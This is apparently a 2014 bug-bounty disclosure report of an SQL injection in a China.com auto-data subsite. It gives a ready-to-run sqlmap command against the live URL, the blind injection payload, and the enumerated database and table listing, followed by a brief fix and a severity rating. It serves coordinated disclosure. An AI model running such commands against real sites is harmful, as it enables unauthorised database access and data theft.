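2014-10-07: Details reported to the vendor; awaiting vendor response
2014-10-11: Vendor confirmed; details disclosed to the vendor only
2014-10-21: Details disclosed to core white hats and experts in the relevant field
2014-10-31: Details disclosed to regular white hats
2014-11-10: Details disclosed to intern white hats
2014-11-21: Details disclosed to the public
SQL injection vulnerability in a China.com (中华网) subsite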
sqlmap.py -u http://data.auto.china.com/SearchAction.do?processID=search --data "keyword=%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97" --level=5 --risk=3 --dbms=oracle --dbs
---
Place: POST
Parameter: keyword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: keyword=-8119' OR (6558=6558) AND 'pkqH' LIKE 'pkqH
---
available databases [3]:
[*] CARTHIRD
[*] SYS
[*] SYSTEM
Database: CARTHIRD
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| AUTO_ATTR_MAP           | 1377654 |
| AUTO_ATTR_MAPBAK        | 1297370 |
| MANALOG                 | 640123  |
| SALE_AUTO               | 269926  |
| SALE_AUTOBAK            | 269817  |
| SALE_AUTO_20140226      | 269783  |
| AUTO_ATTR_TEMPLATE      | 135357  |
| TMP_SALE_AUTO           | 90919   |
| TMP_SALEAUTO            | 46022   |
| TMP_SALEAUTO2           | 43843   |
| FRANCHISE_AGENT         | 34174   |
| TMP_FA2                 | 31294   |
| AUTOTYPE_COMPETITION    | 31180   |
| AUTOTYPE_COMPETITIONBAK | 31180   |
| TMP_FA                  | 27116   |
| CATALOG_NEWS            | 18852   |
| SUB_NEWS                | 13501   |
| SUB_MANALOG             | 12077   |
| CATA_ATTR_MAP           | 11020   |
| AUTOTYPE                | 8167    |
| AUTOTYPE_20140304       | 8148    |
| TPIC                    | 7685    |
| FRANCHISE_NEWS          | 5479    |
| TMP_AUTO                | 4923    |
| FRANCHISE               | 4697    |
| RT11678                 | 4695    |
| AUTO51_TYPE             | 4605    |
| FRANCHISE_0120BAK01     | 4411    |
| TMP_AUTO2               | 4290    |
| TMP_AUTOTYPE            | 3931    |
| TPICGROUP               | 3694    |
| WIKI                    | 1642    |
| TMP_20120301            | 1259    |
……
As above.
Filter input.
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2014-10-11 17:19
None yet.